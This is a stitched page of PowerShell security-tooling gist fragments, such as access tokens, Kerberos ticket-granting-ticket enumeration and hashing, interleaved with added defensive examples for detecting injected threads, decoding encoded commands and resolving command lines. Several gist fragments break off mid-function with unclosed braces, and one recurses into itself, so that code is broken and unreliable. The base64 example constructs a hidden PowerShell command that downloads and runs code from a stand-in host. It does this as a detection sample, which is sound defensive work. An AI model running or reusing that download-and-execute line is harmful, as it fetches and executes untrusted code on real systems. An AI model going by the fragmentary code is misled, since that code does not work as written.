function Get-AccessToken
{
    param
    (
        [Parameter()]
        [System.Diagnostics.Process[]]
        $Process
    )
    begin
function Get-InjectedThread
{
    <#
    .SYNOPSIS
        Looks for threads that were created as a result of code injection.
    .DESCRIPTION
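The check behind this kind of detection is simple: a thread's Win32 start address should sit inside a mapped image (a loaded EXE or DLL, `MEM_IMAGE`). Shellcode written with `WriteProcessMemory` and started with `CreateRemoteThread` begins in `MEM_PRIVATE` memory instead. The following is an added example, not the gist's code; the class and function names are this example's own. It needs 64-bit PowerShell in an elevated prompt to open other users' processes, and cannot open protected (PPL) processes at all.

```powershell
# Added example (not the gist's code): report threads whose start address is not backed by
# a mapped image. Constants are the documented Win32/NT values.
if (-not ('ThreadProbe' -as [type]))
{
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class ThreadProbe
{
    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint   AllocationProtect;
        public IntPtr RegionSize;
        public uint   State;
        public uint   Protect;
        public uint   Type;
    }
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, IntPtr dwLength);
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationThread(IntPtr ThreadHandle, int ThreadInformationClass, out IntPtr ThreadInformation, int ThreadInformationLength, IntPtr ReturnLength);
}
"@
}

$PROCESS_QUERY_INFORMATION       = 0x0400
$PROCESS_VM_READ                 = 0x0010
$THREAD_QUERY_INFORMATION        = 0x0040
$ThreadQuerySetWin32StartAddress = 9          # THREADINFOCLASS value
$MEM_COMMIT                      = 0x1000
$MEM_IMAGE                       = 0x1000000

function Get-SuspiciousThread
{
    [CmdletBinding()]
    param([int[]]$ProcessId)

    $mbiSize = [Runtime.InteropServices.Marshal]::SizeOf([type][ThreadProbe+MEMORY_BASIC_INFORMATION])
    $procs = if ($ProcessId) { Get-Process -Id $ProcessId } else { Get-Process }

    foreach ($p in $procs)
    {
        $hProc = [ThreadProbe]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $p.Id)
        if ($hProc -eq [IntPtr]::Zero) { Write-Verbose "Cannot open $($p.ProcessName) ($($p.Id))"; continue }
        try
        {
            foreach ($t in $p.Threads)
            {
                $hThread = [ThreadProbe]::OpenThread($THREAD_QUERY_INFORMATION, $false, [uint32]$t.Id)
                if ($hThread -eq [IntPtr]::Zero) { continue }
                try
                {
                    # Win32 start address the thread was created with
                    $start = [IntPtr]::Zero
                    $status = [ThreadProbe]::NtQueryInformationThread($hThread, $ThreadQuerySetWin32StartAddress, [ref]$start, [IntPtr]::Size, [IntPtr]::Zero)
                    if ($status -ne 0) { continue }

                    # What kind of region backs that address?
                    $mbi = New-Object ThreadProbe+MEMORY_BASIC_INFORMATION
                    $ret = [ThreadProbe]::VirtualQueryEx($hProc, $start, [ref]$mbi, [IntPtr]$mbiSize)
                    if ($ret -eq [IntPtr]::Zero -or $mbi.State -ne $MEM_COMMIT) { continue }

                    if ($mbi.Type -ne $MEM_IMAGE)
                    {
                        $typeName = switch ($mbi.Type) { 0x20000 { 'MEM_PRIVATE' } 0x40000 { 'MEM_MAPPED' } default { 'UNKNOWN' } }
                        New-Object PSObject -Property @{
                            ProcessName  = $p.ProcessName
                            ProcessId    = $p.Id
                            ThreadId     = $t.Id
                            StartAddress = '0x{0:X}' -f $start.ToInt64()
                            MemoryType   = $typeName
                            Protect      = '0x{0:X}' -f $mbi.Protect
                            RegionBase   = '0x{0:X}' -f $mbi.AllocationBase.ToInt64()
                        }
                    }
                }
                finally { [void][ThreadProbe]::CloseHandle($hThread) }
            }
        }
        finally { [void][ThreadProbe]::CloseHandle($hProc) }
    }
}

Get-SuspiciousThread | Format-Table ProcessName, ProcessId, ThreadId, StartAddress, MemoryType, Protect -AutoSize
```

Expect some benign hits: .NET processes (including the PowerShell host itself) start threads in JIT-compiled private memory, and some packers and anti-cheat drivers do the same. The signal is a thread in `MEM_PRIVATE` with `PAGE_EXECUTE_READWRITE` (0x40) in a process that is not managed code, which is the combination to triage first.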
function Get-Hash
{
    <#
    .SYNOPSIS
        Get-Hash is a PowerShell Version 2 port of Get-FileHash that supports hashing files as well as strings.
    .PARAMETER InputObject
        The item used to calculate the hash. [Byte[]] and [System.IO.Stream] objects are supported.
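A v2-compatible hasher has to avoid `Get-FileHash`, `[pscustomobject]` and `HashAlgorithm.Dispose()` (not public in .NET 3.5). The example below is added here and is not the gist's code; it takes a path, a string or raw bytes, opens files with `FileShare.ReadWrite` so in-use logs can still be hashed, and makes the text encoding explicit, because the same string hashed as UTF-8 and as UTF-16LE gives two different digests (a frequent cause of IOC mismatches).

```powershell
# Added example (not the gist's code): PowerShell 2.0-compatible hashing of files, strings and bytes.
function Get-ContentHash
{
    [CmdletBinding(DefaultParameterSetName = 'Path')]
    param
    (
        [Parameter(ParameterSetName = 'Path', Mandatory = $true, Position = 0, ValueFromPipelineByPropertyName = $true)]
        [Alias('FullName')]
        [string]$Path,

        [Parameter(ParameterSetName = 'String', Mandatory = $true)]
        [string]$String,

        [Parameter(ParameterSetName = 'Bytes', Mandatory = $true)]
        [byte[]]$Bytes,

        [ValidateSet('MD5', 'SHA1', 'SHA256', 'SHA384', 'SHA512')]
        [string]$Algorithm = 'SHA256',

        # Encoding applied to -String before hashing; UTF8 and Unicode (UTF-16LE) give different digests
        [ValidateSet('ASCII', 'UTF8', 'Unicode')]
        [string]$Encoding = 'UTF8'
    )

    process
    {
        $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm)
        $label  = $null
        try
        {
            switch ($PSCmdlet.ParameterSetName)
            {
                'Path'
                {
                    $full = (Resolve-Path -LiteralPath $Path).ProviderPath
                    # FileShare.ReadWrite: hash files another process holds open for writing (logs, databases)
                    $stream = New-Object System.IO.FileStream($full, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
                    try { $digest = $hasher.ComputeHash($stream) } finally { $stream.Close() }
                    $label = $full
                }
                'String'
                {
                    $enc = switch ($Encoding)
                    {
                        'ASCII'   { [System.Text.Encoding]::ASCII }
                        'UTF8'    { [System.Text.Encoding]::UTF8 }
                        'Unicode' { [System.Text.Encoding]::Unicode }
                    }
                    $digest = $hasher.ComputeHash($enc.GetBytes($String))
                    $label  = $String
                }
                'Bytes'
                {
                    $digest = $hasher.ComputeHash($Bytes)
                    $label  = "$($Bytes.Length) bytes"
                }
            }
        }
        finally { $hasher.Clear() }   # Clear() exists on every HashAlgorithm, including .NET 3.5

        $hex = [System.BitConverter]::ToString($digest).Replace('-', '').ToLower()
        New-Object PSObject -Property @{ Algorithm = $Algorithm; Hash = $hex; Input = $label }
    }
}

# Usage:
Get-ContentHash -String 'Invoke-Mimikatz'                       # digest of the UTF-8 bytes
Get-ContentHash -String 'Invoke-Mimikatz' -Encoding Unicode      # different digest: UTF-16LE bytes
Get-ChildItem C:\Windows\System32\*.exe | Get-ContentHash -Algorithm MD5 | Select-Object -First 3
```

When comparing against a published hash of a script or string, find out which byte representation was hashed; PowerShell scripts on disk are commonly UTF-8 (with or without BOM) while `-EncodedCommand` payloads are UTF-16LE.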
#requires -Version 3
# Usage:
# Invoke-command -computername $server -scriptblock {FunctionName -param1 -param2}
# Author: Matt Graeber
# @mattifestation
# www.exploit-monday.com
function Invoke-Command
{
    [CmdletBinding(DefaultParameterSetName='InProcess', HelpUri='http://go.microsoft.com/fwlink/?LinkID=135225', RemotingCapability='OwnedByCommand')]
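The usage line calls a function inside the remote script block, which plain `Invoke-Command` cannot do: the remote runspace has no definition for a function that exists only in the caller's session. The example below is added here and is not the gist's code (the gist's full implementation is not shown on this page; how it handles this is an assumption). It parses the script block's AST, finds calls to functions defined locally, prepends their definitions and forwards the call to the real cmdlet by its module-qualified name. `Invoke-CommandWithLocalFunctions` and `Get-Greeting` are this example's own names.

```powershell
#requires -Version 3
# Added example (not the gist's code): ship local function definitions along with -ScriptBlock.
function Invoke-CommandWithLocalFunctions
{
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory = $true, Position = 0)]
        [scriptblock]$ScriptBlock,

        [string[]]$ComputerName,
        [pscredential]$Credential,
        [object[]]$ArgumentList
    )

    # Every command invocation in the block (CommandAst), e.g. "Get-Greeting -Name x"
    $called = $ScriptBlock.Ast.FindAll({ param($node) $node -is [System.Management.Automation.Language.CommandAst] }, $true) |
              ForEach-Object { $_.GetCommandName() } |
              Where-Object { $_ } |
              Sort-Object -Unique

    # Keep the names that resolve to functions in this session; cmdlets already exist remotely
    $prelude = foreach ($name in $called)
    {
        $fn = Get-Command -Name $name -CommandType Function -ErrorAction SilentlyContinue
        if ($fn) { "function $($fn.Name)`n{`n$($fn.Definition)`n}" }
    }

    # Definitions first, then the caller's original block
    $wrapped = [scriptblock]::Create((@($prelude) + $ScriptBlock.ToString()) -join "`n")

    $forward = @{ ScriptBlock = $wrapped }
    foreach ($p in 'ComputerName', 'Credential', 'ArgumentList')
    {
        if ($PSBoundParameters.ContainsKey($p)) { $forward[$p] = $PSBoundParameters[$p] }
    }
    # Module-qualified so a function named Invoke-Command in scope cannot shadow the real cmdlet
    Microsoft.PowerShell.Core\Invoke-Command @forward
}

# Usage. Without -ComputerName the wrapped block runs locally, enough to see the rewrite work:
function Get-Greeting { param([string]$Name) "hello, $Name" }
Invoke-CommandWithLocalFunctions -ScriptBlock { Get-Greeting -Name 'server1' }
# Invoke-CommandWithLocalFunctions -ComputerName $server -ScriptBlock { Get-Greeting -Name 'server1' }
```

Only one level is captured: helpers that `Get-Greeting` itself calls must be referenced in the block too. If you want to shadow the cmdlet name as the gist does, `[System.Management.Automation.ProxyCommand]::Create((New-Object System.Management.Automation.CommandMetadata (Get-Command Microsoft.PowerShell.Core\Invoke-Command)))` emits a complete proxy with every parameter set, into whose `begin` block the rewrite above can be dropped.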
function Get-StructureOffset
{
    <#
    .SYNOPSIS
        Returns the field offset of the unmanaged form of the managed structure.
    .DESCRIPTION
        Wraps the Marshal class' OffsetOf method to return the offset for all fields in the specified Structure.
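Why this matters: the unmanaged layout includes alignment padding that is invisible in the C# source, and it differs between x86 and x64. A memory parser that computes offsets by hand reads the wrong field. The example below is added here and is not the gist's code; the two `UNICODE_STRING` variants and `Get-FieldOffset` are this example's own, one with default alignment and one with `Pack = 1`, so the padding shows up in the output.

```powershell
# Added example (not the gist's code): unmanaged offset and size of every field via Marshal.OffsetOf/SizeOf.
if (-not ('OffsetDemo.UNICODE_STRING' -as [type]))
{
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
namespace OffsetDemo
{
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING            // 2 + 2 + padding to pointer alignment + pointer
    {
        public ushort Length;
        public ushort MaximumLength;
        public IntPtr Buffer;
    }
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    public struct UNICODE_STRING_PACKED     // same fields, no padding
    {
        public ushort Length;
        public ushort MaximumLength;
        public IntPtr Buffer;
    }
}
"@
}

function Get-FieldOffset
{
    param([Parameter(Mandatory = $true)][type]$Type)

    $total = [System.Runtime.InteropServices.Marshal]::SizeOf($Type)
    $Type.GetFields([System.Reflection.BindingFlags]'Public,Instance') |
        ForEach-Object {
            # SizeOf fails for fields that need MarshalAs info (arrays, strings); report those as unknown
            try { $size = [System.Runtime.InteropServices.Marshal]::SizeOf($_.FieldType) } catch { $size = $null }
            New-Object PSObject -Property @{
                Struct     = $Type.Name
                Field      = $_.Name
                Type       = $_.FieldType.Name
                Offset     = [System.Runtime.InteropServices.Marshal]::OffsetOf($Type, $_.Name).ToInt64()
                Size       = $size
                StructSize = $total
            }
        } |
        Sort-Object Offset |
        Select-Object Struct, Field, Type, Offset, Size, StructSize
}

Get-FieldOffset ([OffsetDemo.UNICODE_STRING])        | Format-Table -AutoSize
Get-FieldOffset ([OffsetDemo.UNICODE_STRING_PACKED]) | Format-Table -AutoSize
```

On 64-bit PowerShell `Buffer` lands at offset 8 in a 16-byte struct for the default layout and at offset 4 in a 12-byte struct when packed; on 32-bit PowerShell both report offset 4 and size 8. Run the check in the same bitness as the process whose memory you intend to parse.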
# This is really beta code used in my Detection Methodology post. I plan to write more efficient code when I get some more time.
function Get-ExtendedAttribute
{
    foreach($file in (Get-ChildItem -Path C:\ -Recurse))
    {
        $obj = Get-ExtendedAttribute -FilePath $file.FullName | Where-Object {$_ -ne $null}
        $obj | Add-Member -MemberType NoteProperty -Name FileName -Value $file.FullName
        Write-Output $obj
    }
function ConvertFrom-Base64
{
    param
    (
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [string]
        $Base64String
    )
    $stringBytes = [System.Convert]::FromBase64String($Base64String)
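Base64 met during triage is rarely clean: it is line-wrapped in logs, sometimes uses the URL-safe alphabet, and often has its padding stripped, and `Convert.FromBase64String` rejects all three. Decoding into the right encoding matters as well; `powershell.exe -EncodedCommand` is always UTF-16LE, so a UTF-8 decode shows every other character as a NUL. The example below is added here and is not the gist's code: a tolerant decoder that returns text or raw bytes, plus a helper that pulls the encoded payload out of a logged command line. `Get-EncodedCommandPayload` and the sample command line are this example's own, and the sample is constructed.

```powershell
# Added example (not the gist's code): tolerant base64 decoding and -EncodedCommand extraction.
function ConvertFrom-Base64
{
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [string]$Base64String,

        [ValidateSet('UTF8', 'Unicode', 'ASCII', 'Bytes')]
        [string]$Encoding = 'UTF8'
    )
    process
    {
        $s = $Base64String -replace '\s', ''           # line breaks and spaces from wrapped output
        $s = $s -replace '-', '+' -replace '_', '/'   # RFC 4648 URL-safe alphabet
        switch ($s.Length % 4)                         # restore stripped padding
        {
            1 { throw "Not valid base64 (length mod 4 is 1): $Base64String" }
            2 { $s += '==' }
            3 { $s += '=' }
        }
        $bytes = [System.Convert]::FromBase64String($s)
        switch ($Encoding)
        {
            'Bytes'   { ,$bytes }                                          # keep the array intact
            'ASCII'   { [System.Text.Encoding]::ASCII.GetString($bytes) }
            'UTF8'    { [System.Text.Encoding]::UTF8.GetString($bytes) }
            'Unicode' { [System.Text.Encoding]::Unicode.GetString($bytes) }  # UTF-16LE
        }
    }
}

function Get-EncodedCommandPayload
{
    # Decodes the argument of -e / -ec / -en / -enc / -encodedcommand (common prefixes powershell.exe accepts)
    param([Parameter(Mandatory = $true, ValueFromPipeline = $true)][string]$CommandLine)
    process
    {
        if ($CommandLine -match '(?i)[-/](?:e|ec|en|enc|encodedcommand)\s+["'']?([A-Za-z0-9+/=]+)')
        {
            New-Object PSObject -Property @{
                CommandLine = $CommandLine
                Decoded     = ConvertFrom-Base64 -Base64String $Matches[1] -Encoding Unicode
            }
        }
    }
}

# Constructed sample: what a process-creation log would show for an encoded command
$payload = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'))
"powershell.exe -NoP -W Hidden -enc $payload" | Get-EncodedCommandPayload | Format-List
# Decoded : IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")

'aGVsbG8gd29ybGQ'  | ConvertFrom-Base64                 # padding missing, still decodes to "hello world"
'aGVsbG8gd29ybGQ=' | ConvertFrom-Base64 -Encoding Bytes  # [byte[]] for binary blobs (droppers, DLLs)
```

Decoded payloads are frequently base64 again, or compressed (`IO.Compression.DeflateStream` / `GZipStream`) inside the base64; loop the decoder until the output stops looking like base64, and never execute what comes out.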
function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS
        Gets the Kerberos Ticket Granting Tickets from all logon sessions.
    .DESCRIPTION
        Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
function Test-Condition
{
    param
    (
        [Parameter(Mandatory = $true)]
        [bool]
        $Result,
        [Parameter(Mandatory = $true)]
        [string]
function Resolve-CommandLineToFilePath
{
    <#
    .SYNOPSIS
        The Resolve-CommandLineToFilePath function takes an arbitrary command line and resolves the called application/file's path.
    .PARAMETER CommandLine
        The command line that you want to convert to a file path.
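Resolving a command line to a file is more than splitting on the first space. `CreateProcess` takes a quoted first token as the program; for an unquoted one it tries each space-delimited prefix in turn (`C:\Program`, then `C:\Program Files\x\y.exe`, ...), and a bare name is searched in the current directory and each `PATH` entry with every `PATHEXT` suffix. The example below is added here and is not the gist's code (the gist's own algorithm is not shown on this page); it implements those rules, and the sample command lines are constructed but reference binaries present on any Windows host.

```powershell
# Added example (not the gist's code): resolve a command line to the executable the loader would start.
function Resolve-CommandLineToFilePath
{
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [string]$CommandLine
    )
    begin
    {
        $exts       = @('') + ($env:PATHEXT -split ';' | Where-Object { $_ })
        $searchDirs = @($PWD.ProviderPath) + ($env:PATH -split ';' | Where-Object { $_ })
        $badChars   = [System.IO.Path]::GetInvalidPathChars()
    }
    process
    {
        $cl = [System.Environment]::ExpandEnvironmentVariables($CommandLine.Trim())

        # Ordered (program, arguments) splits the loader would try
        $attempts = @()
        if ($cl.StartsWith('"'))
        {
            $end = $cl.IndexOf('"', 1)
            if ($end -gt 0) { $attempts += ,@($cl.Substring(1, $end - 1), $cl.Substring($end + 1).TrimStart()) }
        }
        else
        {
            $parts = $cl -split ' '
            for ($i = 1; $i -le $parts.Count; $i++)
            {
                $program = $parts[0..($i - 1)] -join ' '
                $rest    = if ($i -lt $parts.Count) { $parts[$i..($parts.Count - 1)] -join ' ' } else { '' }
                $attempts += ,@($program, $rest)
            }
        }

        foreach ($attempt in $attempts)
        {
            $program, $rest = $attempt
            if ($program.IndexOfAny($badChars) -ge 0) { continue }   # cannot be a path; IsPathRooted would throw

            $candidates = if ([System.IO.Path]::IsPathRooted($program)) { @($program) }
                          else { $searchDirs | ForEach-Object { $_.TrimEnd('\') + '\' + $program } }

            foreach ($candidate in $candidates)
            {
                foreach ($ext in $exts)
                {
                    $full = $candidate + $ext
                    if ([System.IO.File]::Exists($full))
                    {
                        return New-Object PSObject -Property @{
                            CommandLine = $CommandLine
                            FilePath    = [System.IO.Path]::GetFullPath($full)
                            Arguments   = $rest
                        }
                    }
                }
            }
        }
        Write-Warning "Could not resolve: $CommandLine"
    }
}

# Constructed samples
@(
    '"C:\Windows\System32\svchost.exe" -k netsvcs -p',
    'C:\Windows\system32\cmd.exe /c whoami /all',
    'notepad test.txt',
    '%SystemRoot%\explorer.exe'
) | Resolve-CommandLineToFilePath | Format-Table FilePath, Arguments -AutoSize
```

The prefix loop is also the unquoted-service-path weakness: for `C:\Program Files\Vendor\svc.exe`, a writable `C:\Program.exe` wins, and this function will report that file if it exists, which makes it a reasonable audit for service `ImagePath` values. Relative names resolve against the *current* `PATH` and working directory, which may differ from the launching process's environment; treat those results as best effort.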